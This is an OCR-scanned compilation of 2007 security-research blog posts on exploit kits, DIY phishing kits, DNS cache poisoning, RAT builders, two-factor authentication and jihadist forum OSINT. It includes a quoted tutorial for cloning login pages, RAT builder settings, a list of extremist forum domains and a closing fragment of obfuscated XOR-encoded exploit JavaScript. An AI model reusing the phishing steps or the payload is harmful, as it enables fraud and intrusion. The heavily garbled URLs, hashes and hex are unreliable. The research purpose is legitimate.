campaign is a good example of [6]a fast-flux network as 

the malware authors used one mail server to sent the email, 
another IP as actual sender, and a third one where 

the payload, the downloader are [7]hosted with the [8]web 
page itself using the [9]Q4-06 Roll-up package exploits kit: 

" This is [10] a set of exploit scriptsmostiy from the end of 
2006. It includes an M506-042, a SetSlice, an MDAC, a 
WinZip, and a QuickTime. It is typically encrypted using a 
wide variety of javascript obfuscators, but is usually about 
the same source code underneath. Recently it sometimes 
includes an AN I exploit from April 2007. " 

As we have already seen with the most recent and wide scale 
malware campaigns, such as with the IcePack's 

and MPack's kits, the malware authors are entirely relying on 
patched vulnerabilities compared to [lljpurchasing 

zero day ones, further fueling the [ 12]superficial zero day 
vulnerabilities cash bubble, and proving that using old 

vulnerabilities is just as effective as using a zero day one - 
they are both unpatched at the end user's PC. Ensure 

[13]attacks using outdated vulnerabilities cannot take place 
by patching, and don't forget that Storm Worm is among 



the many other [14]malware and [15]spam oubtreaks 
currently active in the wild. 

Related posts: 

[16] Malware Embedded Sites Increasing 

[17] Massive Embedded Web Attack in Italy 

[18] The MPack Attack Kit on Video 

[19] The WebAttacker in Action 

[20] The IcePack Malware Kit in Action 

[21] The Underground Economy's Supply of Goods 
More info: 
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[22] Malware - Future Trends 

[23] New wave of nuwars storming in 

[24] Storm Worm Continues to Spread 

[25] The Storm Worm 

[26] Storm Worm growth is getting out of hand, researchers 
fear 

[27] Storm Trojan Worm evolves and creates Havoc on the 
Internet, warns SecureWorks 

[28] Storm Worm's Virulence May Mean Tactics Change 

[29] Storm Worm Hype Batters Media 
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DIY Phishing Kits (2007-08-13 13:30) 

Rock Phish's efficiency-centered approach in terms of 
[l]hosting numerous phishing pages on a single domain, 
often 

infected home user's host, easily turned it into the default 
application for DIY phishing attacks. And despite that we still 
haven't seen a multi-feature phishing kits like the ones I'm 
certain will emerge anytime now, here's an automatic URL 
redirector of data submitted to a phishing site that's 
showcasing the ongoing DIY phishing kits trend. Basically, 












once the source code of a, for instance, fake paypal login 
page is pasted, it will ensure all the submitted accounting 
data is forwarded to the malicious server where it gets 
logged. The main aim of this tool isn't to achieve mass scale 

efficiency as is the case with Rock Phish, but to make it 
easier for phishers to poin'n'click create or update the fake 
pages to be hosted on a Rock Phish domain. The program's 
intro : 

11 Steps to creating a fake login, simple as 1,2,3. Go you your 
web site or the site you have permisson to make a fake web 
login and right dick then press "Source". Double dick here to 
begin. Enter the redirection URL. The redirection URL is the 
site in which the user who enters their login details will be 
forwarded to after they fill out the form. Optional: For some 
web sites after you creat the phisher some images will not 
load properly. This is due to the source directing the images 
to be loaded from your database instead of their database. 
For example you will 

probably find this in your source img 

src= "/images/image.gif". To fix this you would have to direct 
the source to load from the site's database by editing the 
source to look a little like this img 

src= "http://site.com/images/image.gif". To automatically do 
this double click here. 11 
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Why are DIY phishing kits turning into a commodity, 
and what are some of the strategies to deal with 
phishing sites? 


- fake pages for each and every financial institution plus the 
associated images are a commodity. They look 



like the real ones, sound like the real ones, but anything 
submitted within gets forwarded to a third party presumably 
using DIY tools like these 

- phishing should be treated as spam, namely it should never 
reach the end user's mailbox, but as we've al¬ 
ready seen in the past, certain financial institutions are 
trying to [2]rebuiId confidence in the email communication 

with their customers whereas they should build more 
awareness on how they'd never ever initiate such communi¬ 
cation as it will create even more confusion for the customer, 
the one who's still not aware of the basic phishing 

techniques 

- HTTP referer logs to static images via email clients or web 
based emails could act as an early warning system 

and provide a list of URLs to be automatically feeded into a 
to-be shut down tracking system, ones [3]we've seen 

getting commercialized [4]by vendors already 

- Phishing has become such a widespread problem that he 
latest versions of [5]IE and [6]Firefox now have anti 

phishing protection built-in. Moreover, phishing sites are 
known to [7]exploit browser vulnerabilities to hide [8]the 

real .info and .biz extension of a site, so that a built-in [9]anti 
phishing toolbar picks up where the browser can no longer 
perform. 

As far as the recent increase of [10]Rock Phish domains is 
concerned, DSLreports.com has been keeping track 



of, and [ll]shutting down Rock Phish domains for a while. 
Once shut down, new domain names usually recently 

dropped ones appear online, such as userport.li and 
userport.ch for instance. Go through an article on M [12]The 
History of Rock Phish" as well. 

1. http://ddanchev.blo as pot.com/2007/07/confirm-vour- 
a ullibilitv.html 

2. http://ddanchev.blo as pot.com/2006/04/headin a -in- 
op posite-direction.html 

3. http://ddanchev.blo as pot.com/2007/03/take-this- 
malicious-site-down.html 

4. http://ddanchev.blo as pot.com/2007/Q4/takin a -down- 
phishi n a -sites~business.html 

5. 

http://blo a s.msdn.com/ie/archive/2005/08/31/458663.as px 

6. http://www.informationweek.com/news/showArticle. i html? 
articlelD=201305816 

7. 

http://www.channelre a ister.co.uk/2007/07/25/fi refoxurlbu a 

L 

8 . 

http://news.com.com/Phishi n a + hole+discovered+ in + IE/210 
0-1002 3-5495719.html 


9. http://ddanchev.blo as pot.com/2006/03/anti-phishin a- 
toolbars-can-vou-trust.html 


10. http://www.dslreports.com/forum/rl7714410-Rock-phish- 
information 






































11. http://www.dslreports.com/forum/rl771441Q-Rock-phish- 
information~start=240 

12. http://www.crmbuver.com/alert/58648.html 
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SCM Warning 


□ X 


a SCM Warning for 
jMi www.google.co.uk 

The website you have just visited is on a different IP address 
than the last time you were there The SCM add-on tried to verify 
the IP change, the verifications failed as shown below: 



OK Q Error Unknown Q New Q Old 


Please confirm the website IP change with the website owner and 
choose one of the buttons below to continue Pressing Cancel is 
equivalent to accepting the IP change for 1 minute 


Always Accept 


Accept Changes 

Cancel 


Pharming Attacks Through DNS Cache Poisoning 
(2007-08-13 16:58) 

A month ago, a detailed assessment of a recently released 
[^vulnerability in BIND9 was conducted by Amit Klein 

























to highlight the wide impact typical nameserver 
vulnerabilities have in general, and this one in particular. 
Now that 

[2]an exploit is available as well, the possibility for large 
scale pharming attacks in an automated fashion, becomes 

fully realistic : 

11 A [3] programhas appeared on the MilwOrm exploit portal 
which is able to exploit the recently [4] reported vul¬ 
nerability in the BIND9 nameserver. Transaction IDs can be 
predicted or guessed relatively easily, so the cache of 

a vulnerable nameserver can be poisoned. Phishers can use 

[5] cache poisoningfor pharming attacks on users by 
manipulating the assignment of a server name to an IP 
address. Even if the user enters the name of his bank in the 
address line of his browser manually, he will still be taken to 
a counterfeit web page. " 

[6] Pharming, like any other threat usually receives a cyclical 
media attention, either prompted by [7]a massive 

discovered attack, or to build awareness on an advanced 
phishing scheme to come in a typical "focus on current 

instead on emerging trends" mindset. How would access to a 
namerserver be obtained if not by hacking into it? 

The never-ending underground economy's supply of goods 
model indicates that certain goods such as access to 

breached FTP, Web and DNS servers change value over time 
through the release of such exploits. So suddenly, an 

access to a namerserver gets a higher valuation than usual. 
I've been using a handy [8]Firefox add-on to keep track 



of the constantly changing IPs of various cyber jihadist 
forums and web sites for quite some time now. [9]The tool is 
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actually pitching itself as [10]an anti-pharming add-on you 
ought to evaluate for yourself : 

" SCM performs Site Continuity Management validations on 
websites to help prevent Pharming attacks. Pharming 

attacks are an advanced form of Phishing where an 
adversary poisons the data held in the user's DNS server. 
SCM is believed to be the first add-on to protect users from 
this advanced attack. " 

1. http://www.trusteer.com/docs/bind9dns.html 

2. http://www.heise-securitv.co.uk/news/94220 

3. http://www.milw0rm.com/exploits/4266 

4. http://www.heise-securitv.co.uk/news/93425 

5. http://www.heise-securitv.co.uk/news/93273 

6 . 

http://www.n a ssoftware.com/ pa pers/ThePharmin a Guide.pdf 

7. http://isc.sans.or a /diar v.ph p7storvid=496 

8. https://addons.mozilla.or a /en-US/firefox/addon/4555 

9. http://www.priv8.co.uk/addons/SCM 

10. http://www.priv8.co.uk/addons/SCM/SCM.pdf 
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The Shark 2 DIY Malware (2007-08-16 12:27) 

[l]The Shark2 DIY malware (screenshots, its features, 
checksums of the builder, and the detection rates as of 

Saturday, 28th of July) finally made it though the 
mainstream media, as yet another [2JDIY malware builder in 
the 

wild, despite that the what's promoted as [3]a RAT but is 
actually [4]a malware, has been around since November, 


2006 : 



" The tool is being distributed via several underground 
internet forums. Software development is almost equivalent 
to that available from legitimate software vendors with 
regular updates to the code bringing the latest detected 
version up to version 2.3.2. Virus creation toolkits have been 
available for years, but have mostly been restricted to the 
creation of mass mailing worms and their ilk. [5]DIY phishing 
kits that dumb down the process of constructing fraudulent 

websites began about two years ago. Shark 2 makes the 
process of infecting targets for phishing attacks or 
performing other malign actions easier than ever. It means 
money making malware rackets are no longer the preserve 
of those 

with at least some programming skills. " 

As I've already pointed out in numerous posts, the ongoing 
trend of disseminating DIY malware is mainly done in 
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e -a s - i m i - ■ - e # t z-i-nge 
startup methods > 


notifications > 
binded files > 
plugins > 


restrictions > 


e-mail > 


exe icon/other > 


save as... 


port: 27374 
password: 
re-enter password: 


victim name: :2.2.srv 


protect password: 
re-enter password: 


advanced mode; 


save/load settings 




server settings 


□ use random port 

□ melt server after 
installation 

□ wait for reboot 


server filename: 

•' random filename 


1 specify: 


srv32.exe 


size: 55,881 bytes 


order to generate as much noise as possible thought the 
easy of use of such builders by the average script kiddies. 







And while the infamous [6]Sub7 DIY malware had the same 
features within its builder without, of course, Shark2's 

anti-sandboxing capabilities, back in 2003 Sub7's mission 
was more of a intellectual opportunism one, compared to 

today's noise generation mindset of sophisticated malware 
authors wanting to remain as untraceable as possible. DIY 

malware builders evolved proportionally with the malware 
authors' needs for [7]diversity of the way the malware 

"phones home" in order to get efficiently controlled and the 
data within the infected host efficiently abused. 

Every newly configured trojan variant thought the builder is 
an undetected piece of malware in terms of signatures 

based scanning, and always in the nasty combination with 
[8]malware packers and crypters. Even more interesting 

is the fact that the authors behind the trojan are also reading 
the news, and as always, periodically verifying the 

detecting rates of the builder, namely, the checksums of the 
new builder compared to the one [9]as of 28th of July 

that I provided have changed, and so is the detection rate for 
the latest release (15th of August) : 

Detection rate : 4 AVs out of 32 (12.5 %) detect it 

AntiVir 2007.08.15 TR/Sniffer.VB.C.2 

F-Secure 2007.08.15 Backdoor.Win32.VB.bax 

Kaspersky 2007.08.16 Backdoor.Win32.VB.bax 



Webwasher-Gateway 2007.08.15 Trojan.Sniffer.VB.C.2 

File size: 2506752 bytes 

MD5: e63498f392eed84blc8a66dbb288d459 

SHA1: 5aa39b70dl7dl6055d8084e534806d8e26a37fda 

1. http://ddanchev.blo as pot.com/2007/07/shark2-rat-or- 
rnalware.html 

2. http://isc.sans.or g /diarv.html7storvid = 3269 

3. 

http://www.there a ister.co.uk/2007/08/15/shark tro i an creati 
on kit/ 

4. 

http://www.computerweeklv.com/Articles/2007/Q8/13/22617 
9/ pandal abs-spots-killer-shark-malware.htm 

5. http://ddanchev.blo as pot.com/2007/08/di v- phishin a- 
kits.html 

6. http://en.wikipedia.or a /wiki/Sub7 

7. http://ddanchev.blo as pot.com/2007/03/botnet- 
communication-platforms.html 

8. http://ddanchev.blo as pot.com/2007/07/nnore-malware- 
crv pters-for-sale.html 

9. http://ddanchev.blo as pot.com/2007/07/shark2-rat-or- 
malware.html 
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PayPal's Security Key (2007-08-16 16:31) 

[l]PayPal's recently introduced Security Key two-factor 
authentication for the millions of its customers in 
cooperation with VeriSign's growing centralization of [2]two- 
factor authentication in a typical OpenID style - Ebay's also a 
partner 

- is adding an extra layer of security to the authentication 
process, it's a fact. The entire strategy relies on the fact that, 
if a customer's accounting details get keylogged, or they 
[3]fall victims into a phishing scam and provide the 

accounting data themselves, the phishers or malware 
authors wouldn't be able to login since the key generated in 

the time of keylogging wouldn't be active by the time the 
malicious parties use it the next time. PayPal's Security Key 





















11 Generates a unique six-digit security code about every 30 
seconds. You enter that code when you log in to 

your PayPal or eBay account with your regular user name 
and password. Then the code expires - no one else can use 

it. [4] Watch the demo " 

However, given the spooky commitment from phishers and 
malware authors we've been witnessing for the 

last several years years, wouldn't they entirely bypass this 
extra layer for authentication by basically purchasing 

the $5 Security Key and like legitimate customers, start 
generating security codes ending up with having both the 

accounting data, and the ability to generate valid access 
codes as well? Take E-banking for instance, the pseudo 

random key generators issued by different banks are 
supposed to have different algorithms for generating the 
codes, 

so that we never get the chance to discuss monocultural 
insecurities in two-factor authentication. Malicious parties 

are no longer interested in showing off as rocket scientists, 
but as a pragmatic and efficiency centered crowd. The 

way keylogging evolved into M [5]form grabbing" and entire 
sessions hijackings of malware infected PCs right after the 
user herself authenticates though several factors based 
authentication, in this very same way malicious parties 

[6]started coming up with [7]ways of bypassing compared to 
directly confronting the security measures put in place. 



The flexibility of notifications for financial transactions via 
alert based system and static receipt of notices sent 
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mobile are an alternative. For instance, via the web interface 
of my E-banking provider I can set to receive an SMS 













when a given range of money come and go out of the 
account, sort of an early warning system for self-vigilance. 

What I'm missing is a historical "last logged from" feature, 
and the option to receive an SMS each and every time, I or 
maybe not me logs into the account. Features like these 
should be provided on an opt-in basis, and those customers 

truly perceiving the value of them will pay for the service. As 
always, the market delivers what the customer wants - 

two-factor authentication, and the irony from a psychological 
perspective is that in fact, those with less income are 

more vigilant for possible fraud attempts, than those with 
more income who are more gullible since they can afford 

the losses. 

1. https://www. pav pal.com/securitvke v 

2. http:// a izmodo.com/ a ad a ets/ aada ets/ pav pals-securit v- 
kev- protects-vou-from-phishers-2 28824. oh p 

3. http://ddanchev.blo as pot.com/2007/07/avera a e-online- 
time-for-phishin a -sites.html 

4. 

http://www. pav pal.com/us/en US/m/demo/demo SecuritvKe v 
/secu ritvkev_us.html 

5. http://ddanchev.blo as pot.com/2006/ll/nuclear- a rabber- 
toolkit.html 

6. http://ddanchev.blo as pot.com/2007/Q5/defeatin a -virtual- 
ke vboards.html 





























7. http://ddanchev.blo as pot.com/2006/09/bankin a -tro ian- 
defeatin a -virtual.html 
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The Book of Martyrs 



Message to Reader 


i Sa'id Bin-Ali al-Ghamidi, a well-known real estate 
□di Arabia. 

te In his calm village, "Abd-al-Aziz" was only 17 
is wealthy family to take the first flight to Pakistan 
in 1987. 


534 Biographies of Jihadist Fighters (2007-08-16 
20:49) 

On the look for patterns of terrorist behaviour researchers 
often stereotype in order to portrait a terrorist. The Book of 
Martyrs (compiled in English on June 9th, 2007) is a great 
[1JOSINT source for [2]analysts and intelligence agencies 
wanting to obtain data regarding the lifetime or jihadist 
martyrs, segmented on a per country basis, including 

photos, poems, interviews, transcripts, and links to 
multimedia files. [3]Much like the [4]Technical Mujahid E- 
zine, 

the [5]Mujahideen Harvest magazine, and the [6]Jihadist 
Security Encyclopedia, this E-book is a yet another handy 

source of [7JOSINT data, at least in respect to [8]jihadist 
social networks : 













" Therefore, out of these 81 names: 40 are from the Arabian 
Peninsula, 7 from Yemen, 7 from Syria, 5 from Algeria, 4 

from Kuwait, 4 from Iraq, 3 from Turkey, 1 each from 
Bahrain, Bangladesh, Tunisia, Libya, France and the USA 
whilst the nationalities of the remainder are unknown. 

Theses figures correspond to the relative contribution of the 
Muslim Ummah towards the Jihad in the world today Sadly, 
there are hardly any Muslims from Western nationalities and 

usually they are the most vocal in their slogans for Jihad. " 

A link to a video entitled "Russian Hell in the year 2000, 

Jihad in Chechnya Part One" 511MB is included : 

11 At the time of release of this CD, (July 2000), nine months 
of the War have passed with no end in sight. Russian 
casualties stand at over 15,000 killed or missing in action 
(MIA) and over 30,000 injured. They have lost hundreds of 
battle tanks, fighting vehicles and trucks and tens of fighter 
aircraft and helicopter gunships. 11 

To a second video entitled "Russian Hell in the year 2000, 
Jihad in Chechnya Part Two" : 

" Exclusive, live film footage of two martyrdom operations 
carried out against Russian Barracks in Argun and Gudermes 
in July 2000 Combat footage of Mujahideen operations, 
ambushes and remote-control detonation of Russian Military 

vehicles throughout the Year 2000 Video of the nine OMON 
troops after they were executed due to the failure of the 
Russian Government to hand over the Russian War Criminal 
Colonel Yuri Budanov to the Mujahideen (April 2000)" 

And to a third one entitled "The Martyrs of Bosnia Part One 
and Part Two" : 



11 This unique video by Azzam Publications, the first of its 
kind in the English language with real-life combat footage 
and the first of a four part series, narrates the biographies of 
some of these magnificent individuals, who sacrificed their 
own lives in order to bring life to those around them. " 

Some interesting sections related to ITsecurity and 
anonymity as well : 

- Useful programs to protect personal information on 
computer and on-line 
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Tor [Anonymous web-surfing] ; True crypt [File & disk 
encryption - better than PGP] ; Window Washer [Shred free 
space and files] ; Spy Sweeper [Spyware remover] ; Avast 
[Anti-virus protection] ; Outpost [Computer Firewall] ; Winpt 

[secure encrypted email - better than PGP] ; Ad-aware 
professional [ Another spyware remover ] ; AbiWord [Open 

source - Better alternative to Word] ; Enigmail 

- Best method to protect your chat! 

Use Gaim with OTR plugin and and configure to use TOR 
network ; Gaim [Encrypt your chat conversations]; Off-the- 

Record Messaging [OTR Plug-in] 

- Must have programs for your USB drive 

Mobility Email - Best option for sending secure encrypted 
emails ; GAIM - for secure chat conversation ; Portable 

Firefox ; TorPark - for anonymous web browsing ; True Crypt - 
Best disk encryption & file protection program ; Tutorial for 



securing a USB drive using True Crypt; Cyber Shredder: File 
wiping utility ; ClamWin [Open source anti-Virus 

Program] ; Greatnews - The Intelligent RSS Reader ; Foxit 
PDF Reader opens PDF files ; Abiword - full featured open 

source word processor; Portable Open Office is really the 
only option for an Office Suite 

Propaganda and twisted reality and its best hosted at 
Archive.org, [9]courtesy of [10]Azzam Publications. 

1. http://ddanchev.blo as pot.com/2006/09/benefits-of-open- 
source-intelli a ence.html 

2. http://ddanchev.blo as pot.com/2006/08/analvzin a- 
intelli a ence-analvsts.html 

3. http://ddanchev.blo as pot.com/20Q6/12/analvsis-of- 
technical-mu i ahid-issue-one.html 

4. http://ddanchev.blo as pot.com/2007/Q6/analvsis-of- 
technical-mu i ahid-issue-two.html 

5. http://ddanchev.blo as pot.com/2007/07/mu i ahideen- 
harvest-ma a azine-issue-41.html 

6. http://ddanchev.blo as pot.com/2007/05/ i ihadist-securit v- 
encvclopedia.html 

7. http://ddanchev.blo as pot.com/2006/09/cvber-intelli a ence- 
c vberint.html 

8. http://ddanchev.blo as pot.com/2006/05/terrorist-social- 
network-analvsis.html 


9. http://www.freerepublic.com/focus/news/756623/posts 














































10. http://news.bbc.co.Uk/l/hi/uk/1823045.stm 
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Analyses of Cyber Jihadist Forums and Blogs (2007- 
08-17 01:17) 

Where are cyber jihadists linking to, outside their online 
communities? Which are the [l]most popular file sharing 

and video hosting services used to spread propaganda, 
training material and communicate with each other? What 

are their favorite blogs, and international news sources? How 
does the Internet look like through the eyes of the 

cyber jihadist? This post will provide links to cyber jihadist 
communities, with the idea to aggregate a decent sample of 
how cyber jihadists use, and abuse the Internet to achieve 
their objectives. It is based on external URLs extraction of 
over 5,000 web pages directly related to cyber jihadist 
communities. The snapshot was obtained during the last 

7 days, therefore if you're to data mine the free online data 
hosting URLs, do so in a timely manner before they 

dissapear due to one reason or another. 

Key summary points : 

- Over 4,000 external URLs pointing to suicide bomber's 
videos, propaganda, warfare, bombings, recruitment, torture 










videos, and numerous other still not analyzed cyber jihadist 
forums and blogs 

- In between 500 to 600 web pages per domain were crawled 
based on their last modified data, namely the most 

current 500 to 600 posts 

- The sample consists of 14 jihadist blogs and forums 

- Depending on the online file storage service of choice, files 
will remain online forever if accessed at least once every 30- 
to-45 days, or by the time they don't get removed due to 
their nature 

- Video multimedia is often released in a multi-video-format 
fashion, and multi-quality variants with respect to the 

file size 

- The crawled external URLs are in .txt format, in a one full 
URL per line format 

You are what you link to, so let's assess the "tip of the 
iceberg" cyber jihadist communities online : 
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01. URL : [2]http://3asfh.net/vb 


Dates : Created 20-nov-2003 ; Updated 15-jun-2007; 
Expires 20-nov-2007 

DNS Servers : SERVER.3ASFH.NET; SERVER1.3ASFH.NET 





External URLs : [3]3asfh.net _vb.txt 
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02. URL : [4]http://alsayf.com/forum 

Dates : Created 16-aug-200; Updated 16-aug-2006; Expires 
16-aug-2011 

DNS Servers : NS2.MYDYNDNS.ORG; NS1.MYDYNDNS.ORG; 
NS3.MYDYNDNS.ORG 


External URLs : [5Jalsayf.com_forum.txt 
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03. URL: [6]http://egysite.com/al2nsar 

Dates : Created 01-dec-2002; Updated 13-mar-2007; 
Expires 01-dec-2008 

DNS Servers : NSl.EGYHOSTING.COM; 
NS2.EGYHOSTING.COM; NS1.EGYWWW.COM; 
NS2.EGYWWW.COM 

External URLs : [7Jegysite.com_al2nsar.txt 
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04. URL: [8]http://elshouraa.ws/vb 

Dates : Domain created on 2006-09-15 00:08:38; Domain 
last updated on 2006-09-15 00:08:39 

DNS Servers : nsll.uae-dns.com; nsl2.uae-dns.com 

External URLs : [9]elshouraa.ws vb.txt 
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05. URL: [10]http://muslm.net/vb 

Dates : Created 25-oct-2000; Updated 21-jul-2007; Expires 
25-oct-2007 

DNS Servers : NS1.MUSLM.NETNS2.MUSLM.NET 
External URLs : [ll]muslm.net vb.txt 
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06. URL : [12]http://w-n-n.net/ - DOWN as of yesterday, best 
sample 

Dates : Creation Date: 16-feb-2006; Updated Date: 13-aug- 
2007; Expiration Date: 16-feb-2009 

DNS Servers : A.NS.JOKER.COM; B.NS.JOKER.COM; 
CNS.JOKER.COM; 

External URLs : [13Jw-n-n.net.txt 
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07. URL: [14]http://minbar-sos.com 


Dates : Created 28-feb-2006; Updated 10-mar-2007; Expires 
28-feb-2008 

DNS Servers: NSl.BRAVEHOST.COM; NS2.BRAVEHOST.COM 


External URLs : [15]minbar-sos.com.txt 
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Azzam the American AKA, introduced end praised by 
al-Qaeda’s number two. Dr. Aym«n al-Zawahiri, 
appears in a forty-eight minute video produced by 
as-Sahab, an al-Qaeda multimedia production 
organization, titled, "An Invitation to Islam," which 
was distributed to the Xntemot today, Saturday, 
September 2, 2006. Zawahin, regarding Gadahn, 
states: "And as our brother Azzam the American talks 
to you, ha talks to you as one concerned about the fate 
which awaits his people, and as a perceptive person 
who wants to lead hts people our of darkness Into the 
light. So listen to him, because what he is talking to 
you about is serious and significant. He is talking to 
you about the fate which awaits every human en 
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14. [33]URL 

[34]External URLs[35] 

Now, it's up to your data mining and crawling capabilities. 

Related posts: 

[36] Cyberterrorism - don't stereotype and it's there 

[37] Tracking Down Internet Terrorist Propaganda 

[38] Arabic Extremist Group Forum Messages' Characteristics 

[39] Cyber Terrorism Communications and Propaganda 

[40] Techno Imperialism and the Effect of Cyberterrorism 







[41] A Cost-Benefit Analysis of Cyber Terrorism 

[42] Current State of Internet Jihad 

[43] Characteristics of Islamist Websites 

[44] Hezbollah's DNS Service Providers from 1998 to 2006 
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[45 ] Fu 11 List of Hezbollah's Internet Sites 

[46] lnternet PSYOPS - Psychological Operations 

[47] Cyber Traps for Wannabe Jihadists 

[48] Mujahideen Secrets Encryption Tool 

[49] An Analysis of the Technical Mujahid Issue One 

[50] An Analysis of the Technical Mujahid Issue Two 

[51] Terrorist Groups' Brand Identities 
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[53] Jihadists' Anonymous Internet Surfing Preferences 
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[58]Steganography and Cyber Terrorism Communications 
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Build 
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Password admin 
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Windows Folder 
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Program Folder 


l^j Build Server 
Js Set Default Settings 
Clear Data 

i y Scan With Virustotal.com 



y-j. Connections 

Build Server 

1 .. |Settings 

.Options About 



Status: Idle 


Connections: 0 


Port: 0 : 0 


RATs or Malware? (2007-08-20 14:36) 


After the [l]Shark 2 DIY Malware got the publicity it deserved 
as perhaps the most recent and publicly obtainable 

[2]DIY malware, another DIY RAT has been gaining popularity 
amoung the script kiddies crowd for a while. Shark 2's 

features and capabilities for "killing" anti virus software and 
tricking sandboxes are far more advanced than this RAT's 
one, no doubt about it. However, what makes an impression 
in this one is the built-in capability to check the latest 





























server against the most popular anti virus software engines. 

Detection rate for the latest builder: Result: 15/32 (46.88 
%) 

File size: 2981888 bytes 

MD5: 5683024dbfd73d92cl03d2ecc4f98258 

SHA1: 34d341df36582906eb5dl8el2139478b8772ea64 

Detection rate for a previous version of the builder: Result: 
9/32 (28.13 %) 

File size: 2426880 bytes 

MD5: 4343eb64b3d4836b5ef49643b3320112 

SHA1: beb6bd04d587f4253e5b26e4bal827c8b200a214 

Detection rate for another version of the builder: Result: 
23/32 (71.88 %) 
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File size: 4860416 bytes 

MD5: 0fefl06915b40cflc0a411a4f5aee4bb 

SHA1: a7alclbdd388c20964cf54db4607bf650d890562 

Detection rate for the first version of the builder: Result: 
24/32 (75 %) 

File size: 2466304 bytes 

MD5: Iee90062bebfe3dd9bbdd9d3c9fclf6c 


SHA1: 2c02b76497dd3bfa00c313e9e4a0bd0d8b2893a6 



Another issue that deserves more attention is [3]VT's opt-out 
feature for not distributing the sample to AV 

vendors " If checked, in case the file is suspicious of being 
malware we will not distribute it to antivirus companies. " 

Any malware authors or script kiddies out there, wanting to 
measure the detecting rates for their release without 

providing the AVs not currently detecting it with a sample of 
it? Perhaps thousands of them. 

The line between RATs and malware is definitely getting 
thinner these days. 

1. http://ddanchev.blo as pot.com/20Q7/Q8/shark-2-di v- 
malware.html 

2. http://ddanchev.blo as pot.com/2007/Q7/shark2-rat-or- 
malware.html 

3. http://www.virustotal.com/ 
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<Script Language='JavaScript'> Function xor_str(plain_str, xor_key)< uar xored_str = ■■■•; 

For (uar i = 0 ; i < plain_str.length; ++i) xo red_str += String-FronCharCode(xor_key 
plain_str-charCodeflt(i)); r eturn xored_str; > r3TT!rfW!T!W?T!T3TBH3?T TTI3TrjPWi t H!>CTlWiTT!T»ftm 
ffitTfffirjlkmilJWiUJiWiliHliH F 1 :uar plain_str = 

"\x80\xad\xaa\xad\xaa\xd6\xc1\xd2\x80\xcd\xcd\x80\x9d\x80\xce\xc5\xd7\x80\xe1\xd2\xd2\xc1\xd 

\x89\x9b\xad\xaa\xd6\xc1\xd2\x80\xcd\xc5\xcd\xFF\xc6\xcc\xd\xc7\x80\x9d\x80\x90\x9b\xad\xaa 

xaa\xc6\xd5\xce\xc3\xd4\xc9\xcF\xce\x80\xc8\x88\x89\x80\xdb\xcd\xcd\x9d\xcd\xcd\x9b\x80\xd3\ 

d4\xF4\xc9\xcd\xc5\xcF\xdS\xd4\x88\x82\xc8\x88\x89\x82\x8c\x80\x92\x90\x90\x90\x89\x9b\xdd\x 

a\xad\xaa\xc6\xd5\xce\xc3\xd4\xc9\xcF\xce\x80\xc7\xc5\xd4\xc2\x88\xc2\x8c\x80\xc2\xF3\xc9\xd 

\x89\xad\xaa\xdb\xd7\xc8\xc9\xcc\xc5\x80\x88\xc2\x8e\xcc\xc5\xce\xc7\xd4\xc8\x8a\x92\x9c\xc2 

xc9\xda\xc5\x89\xdb\xc2\x80\x8b\x9d\x80\xc2\x9b\xdd\xad\xaa\xc2\x80\x9d\x80\xc2\x8e\xd3\xd5\ 

d3\xd4\xd2\xc9\xce\xc7\x88\x90\x8c\xc2\xF3\xc9\xda\xc5\x8F\x92\x89\x9b\xd2\xc5\xd4\xd5\xd2\x 

0\xc2\x9b\xdd\xad\xaa\xad\xaa\xc6\xd5\xce\xc3\xd4\xc9\xcF\xce\x80\xc3\xc6\x88\x89\xad\xaa\xd 

\xc1\xd2\x80\xda\xc3\x80\x9d\x80\x90\xd8\x90\xc4\x90\xc4\x90\xc4\x90\xc4\x9b\xad\xaa\xd6\xd 

x80\xc1\x80\x9d\x80\xd5\xce\xc5\xd3\xc3\xc1\xd0\xc5\x88\x82\x85\xd5\x94\x93\x94\x93\x85\xd5\ 

93\x94\x93\x8S\xdS\x90\xc6\xc5\xc2\x85\xd5\x93\x93\x95\xc2\x85\xd5\x96\x96\xc3\x99\x85\xd5\x 

0\xc2\x99\x85\xd5\x98\x90\x90\x91\x85\xd5\xc5\xc6\x93\x93\x82\x80\x8b\xad\xaa\x82\x85\xd5\xc 

\x94\x93\x85\xdS\xcS\xc2\xc6\xd\x85\xd5\xc5\x98\x90\x95\x85\xd5\xc6\xc6\xc5\xc3\x85\xd5\xc6 

xc6\xc6\x85\xdS\x98\xc2\x97\xc6\x85\xd5\xc4\xc6\x94\xc5\x85\xd5\xc5\xc6\xc5\xc6\x85\xd5\x96\ 

C5\xc6\x85\xds\xc5\x93\xc1\xc6\x85\xd5\x99\xc6\x96\x94\x85\xd5\x94\x92\xc6\x93\x85\xd5\x99\x 

6\x94\x85\xd5\x96\xc5\xcS\x97\x85\xd5\xc5\xc6\x90\x93\x85\xd5\xc5\xc6\xc5\xc2\x82\x80\x8b\xa 

\x82\x85\xd5\x96\x94\xc5\xc6\x85\xd5\xc2\x99\x90\x93\x85\xd5\x96\x91\x98\x97\x85\xd5\xc5\x91 

x91\x85\xdS\x90\x97\x90\x93\x85\xd5\xcS\xc6\x91\x91\x85\xd5\xc5\xc6\xc5\xc6\x85\xdS\xc1\xc1\ 

96\x85\xdS\xc2\x99\xc5\xc2\x85\xd5\x97\x97\x98\x97\x85\xd5\x96\x95\x91\x91\x85\xd5\x90\x97\x 

1\x85\xd5\xc5\xc6\x91\xc6\x8S\xd5\xc5\xc6\xc5\xc6\x85\xd5\xc1\xc1\x96\x96\x85\xd5\xc2\x99\xc 

\x82\x80\x8b\xad\xaa\x82\x85\xdS\xc3\xd\x98\x97\x85\xd5\x91\x90\x95\xc6\x85\xd5\x90\x97\x92 

x85\xd5\xc5\xc6\x90\xc4\x85\xd5\xc5\xc6\xc5\xc6\x85\xd5\xc1\xc1\x96\x96\x85\xd5\xc2\x99\xc5\ 

85\xdS\x90\x90\x98\x97\x8S\xd5\x90\xc6\x92\x91\x85\xd5\x90\x97\x98\xc6\x85\xd5\xc5\xc6\x93\x 

5\xd5\xc5\xc6\xc5\xc6\x85\xd5\xc1\xc1\x96\x96\x85\xd5\xc2\x99\xc6\xc6\x85\xd5\x92\xc5\x98\x9 

\xd5\x90\xd\x99\x96\x82\x80\x8b\xad\xaa\x82\x85\xd5\x90\x97\x95\x97\x85\xd5\xc5\xc6\x92\x99 

xd5\xc5\xc6\xc5\xc6\x85\xd5\xc1\xc1\x96\x96\x85\xd5\xc1\xc6\xc6\xc2\x85\xd5\xc4\x97\x96\xc6\ 

